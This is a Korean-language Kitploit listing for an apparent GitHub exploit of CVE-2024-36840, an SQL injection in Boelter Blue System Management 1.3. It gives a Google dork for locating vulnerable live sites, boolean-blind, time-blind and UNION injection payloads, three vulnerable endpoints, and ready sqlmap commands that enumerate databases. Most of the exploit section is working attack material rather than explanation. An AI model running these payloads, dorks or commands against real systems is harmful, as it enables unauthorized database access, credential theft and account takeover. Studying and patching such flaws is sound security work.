Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-36840-Exploit — # CVE-2024-36840 익스플로잇: Boelter Blue System Management의 SQL 인젝션 취약점 (버전 1.3) | Kitploit
도구/GitHubGitHub/theexploiters/cve-2024-36840-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

# CVE-2024-36840 익스플로잇: Boelter Blue System Management의 SQL 인젝션 취약점 (버전 1.3)

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-36840: Boelter Blue 시스템 관리(버전 1.3)의 SQL 인젝션 취약점

익스플로잇 세부 정보

  • 익스플로잇 제목: Boelter Blue 시스템 관리(버전 1.3)의 SQL 인젝션 취약점

  • 원본 Google Dork: inurl:"Powered by Boelter Blue" (작동하지 않음(검색 결과 0개))

  • Theexploiters의 Google Dork: intext:"Powered by Boelter Blue" (작동함)

  • 날짜: 2024-06-04

  • 익스플로잇 작성자: CBKB (DeadlyData, R4d1x)

  • 공급업체 홈페이지: Boelter Blue

  • 소프트웨어 링크: Google Play 스토어

  • 버전: 1.3

  • 테스트 환경: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12

  • CVE: CVE-2024-36840

취약점 설명

Boelter Blue 시스템 관리(버전 1.3)에서 여러 SQL 인젝션 취약점이 확인되었습니다. 이러한 취약점으로 인해 공격자는 다양한 파라미터를 통해 임의의 SQL 명령을 주입하고 실행할 수 있습니다. 성공적으로 악용될 경우 무단 액세스, 데이터 유출 및 잠재적인 계정 탈취로 이어질 수 있습니다.

영향을 받는 파라미터 및 익스플로잇 세부 정보:

  1. 파라미터: id (GET)

    • 유형: Boolean 기반 블라인드
    • 페이로드: id=10071 AND 4036=4036
  2. 유형: 시간 기반 블라인드

    • 페이로드: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. 유형: UNION 쿼리

    • 페이로드: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

취약한 엔드포인트

  1. news_details.php?id

    • 예시: https://www.example.com/news_details.php?id=10071
    • 악용 방법:
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • 예시: https://www.example.com/services.php?section=5081
    • 악용 방법:
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • 예시: https://www.example.com/location_details.php?id=836
    • 악용 방법:
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

영향

  • 무단 데이터베이스 액세스: 악용 시 데이터베이스에 대한 무단 액세스가 가능해져 공격자가 민감한 정보를 추출할 수 있습니다.
  • 데이터 유출: 관리자 자격 증명, 사용자 개인정보, 구매 내역 등의 민감한 데이터가 손상될 수 있습니다.
  • 계정 탈취: 공격자가 사용자 계정을 탈취할 수 있습니다.
  • 전체 제어: 영향을 받는 애플리케이션에 대한 전체 제어권을 획득할 수 있어 심각한 보안 문제가 발생할 수 있습니다.

크레딧

  • 발견자: CBKB (DeadlyData, R4d1x)

참고 자료

  • CyberDepot 취약점 보고서
  • CVE-2024-36840

Repo View Counter

도구 다운로드